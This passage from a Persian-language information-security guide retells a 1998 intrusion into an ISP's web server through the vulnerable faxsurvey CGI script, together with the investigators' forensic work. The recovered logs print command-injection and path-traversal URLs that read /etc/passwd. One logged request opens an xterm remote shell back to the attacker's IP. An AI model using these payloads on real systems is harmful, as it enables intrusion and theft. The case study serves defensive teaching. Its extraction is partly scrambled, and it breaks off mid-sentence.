0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2
tcp
0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED
tcp
0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp
0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED
tcp
0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED
tcp
0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED
tcp
0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2
tcp
0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2
tcp
0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED
tcp
0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED
tcp
0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED
tcp
0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT
tcp
0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp
8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED
tcp
0 0 LOCALHOST.VINEYA.4778 *.* LISTEN
tcp
0 0 LOCALHOST.VINEYA.domai *.* LISTEN
tcp
0 0 NET10.VINEYARD.N.domai *.* LISTEN
tcp
0 0 SMTP4.VINEYARD.N.domai *.* LISTEN
٢٧٣
‫ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬:‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ ﺑﻪ ﺩﺳـﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ‬xterm ‫ ﺑﺮﺍﻱ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚ‬CGI ‫ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ‬ISP
:‫ ﺍﻧﺠﺎﻡ ﺷﺪ‬ISP ‫ ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﺳﺮﻳﻊ ﺩﺭ ﻣﻴﺎﻥ ﺛﺒﺘﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ‬،‫ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻳﻦ ﻓﺮﺿﻴﻪ‬.‫ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ‬
1.
2.
3.
4.
5.
6.
7.
8.
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
9.
10.
11.
12.
13.
14.
15.
% grep -I krldb110-06 /vni/apache/log/access_log
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] “GET /cgi-bin/
phf?Qname=me%0als%20-lFa
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] “GET /cgi-bin/ faxsurvey?ls%20lFa HTTP/1.0”
200 5469 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] “GET /cgi-bin/
viewsource?../../../../../../../../
etc/passwd HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows
98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] “GET /cgi-bin/
htmlscript?../../../../../../../../etc/passwd HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE
4.01;Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] “GET /cgi-bin/
campas?%0als%20-lFa
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] “GET /cgi-bin/
handler/useless_shit;ls%20lFa|?data=Download HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE 4.01; Windows
98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] “GET /cgi-bin/
php.cgi?/etc/passwd
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] “GET /cgi-bin/ faxsurvey?ls%20lFa HTTP/1.1”
200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] “GET /cgi-bin/
faxsurvey?uname%20-a
HTTP/1.1” 200 461 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] “GET /cgi-bin/ faxsurvey?id
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] “GET /cgi-bin/
faxsurvey?cat%20/etc/passwd
HTTP/1.1” 200 79467 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] “GET /cgi-bin/ faxsurvey?ls%20lFa%20/usr/
HTTP/1.1” 200 1701 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] “GET /cgi-bin/ faxsurvey?id
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] “GET /cgi-bin/ faxsurvey?pwd
HTTP/1.1” 200
305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] “GET /cgi-bin/
faxsurvey?/bin/pwd HTTP/1.1”
‫‪٢٧٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫”‪200 305 “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/web.vineyard.net‬‬
‫‪16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] “GET /cgi-bin/ faxsurvey?ls%20‬‬‫”‪lFa HTTP/1.1‬‬
‫”‪200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net‬‬
‫‪17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] “GET /cgi-bin/ faxsurvey?ls%20‬‬‫”)‪lFa%20../conf/ HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98‬‬
‫”‪“/htdocs/web.vineyard.net‬‬
‫ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺳﻄﺮﻫﺎﻱ ‪ ۱‬ﺗﺎ ‪ ۷‬ﺑﺎ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺍﺧﺘﻼﻑ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺭﺥ ﺩﺍﺩﻩﺍﻧـﺪ‪ .‬ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺍﺑـﺰﺍﺭ ﺍﺗﻮﻣﺎﺗﻴـﻚ ﻛـﻪ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ CGI‬ﺭﺍ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﻄﺮﻫﺎﻱ ‪ ۸‬ﺗﺎ ‪ ،۱۷‬ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ‬
‫‪ faxsurvey‬ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﺮﻳﺐ ﺑﻪ ﻳﻘﻴﻦ ﺑﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺘﻔﺎﻭﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‪ .‬ﻳﻚ ﺩﻟﻴـﻞ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻧﺴﺨﺔ ﭘﺮﻭﺗﻜﻞ ‪ HTTP‬ﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﺮﺩﻩ ﺍﺯ "‪ "HTTP/1.0‬ﺑﻪ "‪ " HTTP/1.1‬ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﻓﺎﻳﻞ ﺛﺒﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺁﺷﻜﺎﺭ ﻛﺮﺩ ﻛﻪ ﺍﺳﻢ ﻛﺎﻣﻞ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ ‪ krldb110-06.splitrock.net‬ﺑﻮﺩﻩ ﺍﺳـﺖ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻓﺮﻣﺎﻥ ‪ ،host‬ﺍﻳﻦ ﺁﺩﺭﺱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻭﺍﻗﻌﻲ ﺗﺮﺟﻤﻪ ﺷﻮﺩ‪:‬‬
‫‪apache: {43} % host krldb110-06.splitrock.net‬‬
‫‪krldb110-06.splitrock.net has address 209.156.113.121‬‬
‫‪apache: {44} %‬‬
‫ﺑﺎ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻓﺎﻳﻞ ﺛﺒﺖ‪ ،‬ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ‪ /cgi-bin/faxsurvey‬ﻧﻘﺼﻲ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻓـﺮﺍﻣﻴﻦ‬
‫ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻪ ﭼﻪ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺑﻮﺩ ﻣﻬﺎﺟﻢ ﺑﺎ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺭﺳﺎﻝ ‪URL‬ﻫﺎ ﺑﺎ ﺁﺭﮔﻮﻣﺎﻥﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺑﭙﺮﺩﺍﺯﺩ؟(‪.‬‬
‫ﺍﮔﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺻﺤﺖ ﻣﻲﺩﺍﺷﺖ‪ ،‬ﺁﻧﮕﺎﻩ ﻓﺮﺍﻣﻴﻦ ﺯﻳﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ‪:‬‬
‫‪ls -lFa‬‬
‫‪ls -lFa‬‬
‫‪uname -a‬‬
‫‪id‬‬
‫‪cat /etc/passwd‬‬
‫‪ls -lFa /usr/‬‬
‫‪id‬‬
‫‪pwd‬‬
‫‪/bin/pwd‬‬
‫‪ls -lFa‬‬
‫‪ls -lFa../conf/‬‬
‫ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﺷﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻬﺎﺟﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻓﺮﺍﻣﻴﻦ ﺑﻪ ﺍﺟﺮﺍﻱ ﻓﺮﻣﺎﻥ ‪ xterm‬ﺑﺮﺳﺪ‪ ،‬ﺍﻣـﺎ ﺑـﻪ ﺧـﻮﺑﻲ ﺭﻭﺷـﻦ‬
‫ﺍﺳﺖ ﻛﻪ ﻓﺮﻣﺎﻥ ‪ xterm‬ﺍﺟﺮﺍ ﺷﺪﻩ‪ ،‬ﭼﻮﻥ ﺳﻄﺮ ‪ HTTP‬ﺩﺭ ﺧﺮﻭﺟﻲ ﻓﺮﻣﺎﻥ ‪ ،w‬ﭘﺮﺩﺍﺯﺓ ‪ xterm‬ﺩﺭﺣﺎﻝ ﺍﺟـﺮﺍ‪ ،‬ﻭ ﺳـﻄﺮ ‪ X11‬ﺩﺭ ﻓﺮﻣـﺎﻥ‬
‫‪ netstat‬ﺷﻮﺍﻫﺪﻱ ﺑﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ‪ ISP ،‬ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺟﺴﺘﺠﻮ ﻛﺮﺩ‪ .‬ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺸﻜﻮﻙ ﺩﺭ ﻓﺎﻳـﻞ ﺛﺒـﺖ ﭘﻴﺎﻣﻬـﺎ‬
‫‪٤٧‬‬
‫ﭘﻴﺪﺍ ﺷﺪ ‪ -‬ﻇﺎﻫﺮﹰﺍ ﻣﻬﺎﺟﻢ ﺗﻼﺵ ﻛﺮﺩﻩ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﻘﺺ ﺩﺭ ‪ POP‬ﻳﺎ ‪ qpopper‬ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪:‬‬
‫* ‪apache: {15} % grep -i krldb110-06‬‬
‫‪messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06. splitrock.net: -ERR‬‬
‫‪POP‬‬
‫‪timeout‬‬
‫ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﺎﺑﻘﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﻬﺎﺟﻢ‪ ،‬ﺁﻧﻬﺎ ﻣﺘﻮﻗﻒ ﺷﺪﻧﺪ‪ ،‬ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺣﺎﻓﻈﺔ ﭘﺮﺩﺍﺯﺷﻲ ﺫﺧﻴﺮﻩ ﺷﺪ‪ ،‬ﻭ ﺁﻧﮕـﺎﻩ ﭘـﺮﺩﺍﺯﻩﻫـﺎ ﺍﺯ‬
‫ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻪ ﺷﺪﻧﺪ‪.‬‬
‫‪Messages Log File‬‬
‫‪47‬‬
‫‪٢٧٥‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺑﻪ ﺩﻧﺒﺎﻝ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺿﺎﺑﻄﻪ ﺑﻪ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎﻱ ‪ ISP‬ﺍﺿـﺎﻓﻪ ﺷـﺪ ﺗـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺁﺩﺭﺳـﻬﺎﻱ ‪ IP‬ﻣﻬـﺎﺟﻢ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ‪ .‬ﻣﺠﻮﺯﻫـﺎﻱ‬
‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ faxsurvey‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻨﺪ ﺗﺎ ﻫﻤﻪ ﭼﻴﺰ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﻳﻚ ﺗﺠﺴﺲ ﺁﻣﺎﺩﻩ ﺑﺎﺷﺪ‪ .‬ﭼﻨـﺪ ﺭﻭﺯ‬
‫ﺑﻌﺪ ﻫﻢ ﺗﻜﻪﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺣﺬﻑ ﺷﺪ‪.‬‬
‫‪ ISP‬ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺗﻲ ‪ SplitRock‬ﺗﻤﺎﺱ ﮔﺮﻓﺖ؛ ﻫﻤﺎﻥ ‪ ISP‬ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺁﺩﺭﺱ ‪ IP‬ﻣﻬﺎﺟﻢ ﺭﺍ ﻋﻬـﺪﻩﺩﺍﺭ ﺑـﻮﺩ‪ .‬ﻣـﺸﺨﺺ‬
‫ﺷﺪ ﻛﻪ ‪ SplitRock‬ﭼﻨﺪ ‪ modem pool‬ﻛﻪ ﺑﺮﺍﻱ ‪ ISP‬ﺩﻳﮕﺮ ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﻳﻚ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﺔ ﺍﺟﺎﺭﻩ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﺍﺯ ‪ SplitRock‬ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺩﺭ ﺗﺤﻘﻴﻘﺎﺕ ﺁﺗﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ ‪ strings‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻬﺎﺟﻢ ﺑﺪﺳـﺖ ﺁﻳـﺪ‪ .‬ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ ﺭﺷـﺘﻪﻫـﺎ‬
‫‪٤٨‬‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺑﻘﺔ ﭘﻮﺳﺘﻪ ﻣﻲﺷﺪﻧﺪ‪ ،‬ﻛﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﺗﺎﻳﭗﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺨﺺ ﻣﻬﺎﺟﻢ ﺑﻮﺩﻧﺪ‪ .‬ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻣﻬﺎﺟﻢ ﻳﻚ ‪rootkit‬‬
‫ﺭﺍ ‪ download‬ﻛﺮﺩﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻼﺵ ﺩﺍﺷﺘﻪ ﻛﻪ ﻳﻚ ﺣﻤﻠﺔ ﺳﺮﺭﻳﺰﻱ ‪ ٤٩Buffer‬ﻋﻠﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ IMAP‬ﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪:‬‬
‫‪Shell History‬‬
‫‪Buffer Overflow Attack‬‬
‫‪48‬‬
‫‪49‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪-lFa‬‬
‫‪gcc -o s s.c‬‬
‫‪st2.c‬‬
‫‪ftp 209.156.113.121‬‬
‫‪cron.c‬‬
‫‪gcc -o s st2.c‬‬
‫‪cxterm.c ./s console‬‬
‫‪x2.c‬‬
‫‪t.s‬‬
‫‪qpush.c .121‬‬
‫‪cat t.c‬‬
‫‪qpush.c‬‬
‫‪cat.c‬‬
‫‪ppp.c‬‬
‫‪cat s.c‬‬
‫‪t2.c‬‬
‫‪gc c‬‬
‫‪cron.c‬‬
‫‪ls -lFa‬‬
‫‪cxterm.c‬‬
‫‪./s -v c2 tcsh‬‬
‫‪./s p0‬‬
‫‪x2.c‬‬
‫‪ls -lFa / README‬‬
‫‪cat.s‬‬
‫‪README.debian‬‬
‫‪ls -lFa‬‬
‫‪qpush‬‬
‫‪cat /w‬‬
‫‪qpush.c‬‬
‫‪ls -lFa / qpush.c.old‬‬
‫‪cat.s‬‬
‫‪Gf: not found‬‬
‫‪_=.s‬‬
‫‪/tmp‬‬
‫‪$ : not found‬‬
‫‪mfs:28‬‬
‫‪gcc -o s steal.c /bin/sh‬‬
‫‪ls -lFa *.c‬‬
‫‪/bin/sh‬‬
‫‪/bin/sh‬‬
‫‪/etc/inetd.conf‬‬
‫‪qpush.c‬‬
‫‪/usr/bin/gcc‬‬
‫‪n/gcc‬‬
‫‪./cc‬‬
‫‪Expr‬‬
‫‪Done‬‬
‫‪/bin/sh‬‬
‫‪inetd.conf‬‬
‫‪t) | telnet 127.1 143‬‬
‫‪cd /etc‬‬
‫‪cat.s‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
٢٧٦
which pwd
ls –lFa
expr $L + 1
ls –lFa
./cc –10
./cc
‫ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﺘﻐﻴﻴﺮﻫﺎﺋﻲ ﺑﻮﺩﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﺯ‬.‫ﻧﻮﻉ ﺩﻭﻡ ﺭﺷﺘﻪﻫﺎ ﻛﻪ ﺩﺭ ﺗﺼﺎﻭﻳﺮ ﺣﺎﻓﻈﻪ ﭘﻴﺪﺍ ﺷﺪﻧﺪ ﻣﺘﻨﺎﻇﺮ ﻣﺘﻐﻴﻴﺮﻫﺎﻱ ﭘﻮﺳﺘﻪ ﺑﻮﺩﻧﺪ‬
CGI ‫ ﻛﻪ ﻣﺆﻳﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺍﺟﺮﺍﻱ ﭘﻮﺳﺘﻪ ﻧﺘﻴﺠﺔ ﻳﻚ ﺗﻬـﺎﺟﻢ‬- ‫ ﺑﺮﺍﻱ ﻳﻚ ﭘﺮﺩﺍﺯﻩ ﺗﻨﻈﻴﻢ ﺷﻮﻧﺪ‬CGI ‫ﻃﺮﻳﻖ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ‬
‫ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬،‫ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﻧﻔـﻮﺫ ﻣﺘﻮﺟـﻪ ﺁﻥ ﺑـﻮﺩ‬CGI ‫ ﺍﻳﻦ ﻗﺴﻤﺖ )ﺑﺨﺶ ﺯﻳﺮ( ﺗﺄﻳﻴﺪ ﻣﻲﻛﺮﺩ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ‬.‫ﺑﻮﺩﻩ ﺍﺳﺖ‬
:‫ ﺑﻮﺩ‬faxsurvey
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint,
*/*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.
113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
[email protected]
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[
%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\
E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
‫‪٢٧٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﭘﺲ ﺍﺯ ﻧﻔﻮﺫ‪ ISP ،‬ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺩﻓﺘﺮ ﺗﺠﺴﺲ ﺩﻳﻮﺍﻥ ﻓﺪﺭﺍﻝ ﺩﺭ ﺑﻮﺳﺘﻮﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺖ‪ ISP .‬ﻣﻄﻠﻊ ﺷﺪ ﻛـﻪ ﺩﻓﺘـﺮ ﺑﻮﺳـﺘﻮﻥ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ‬
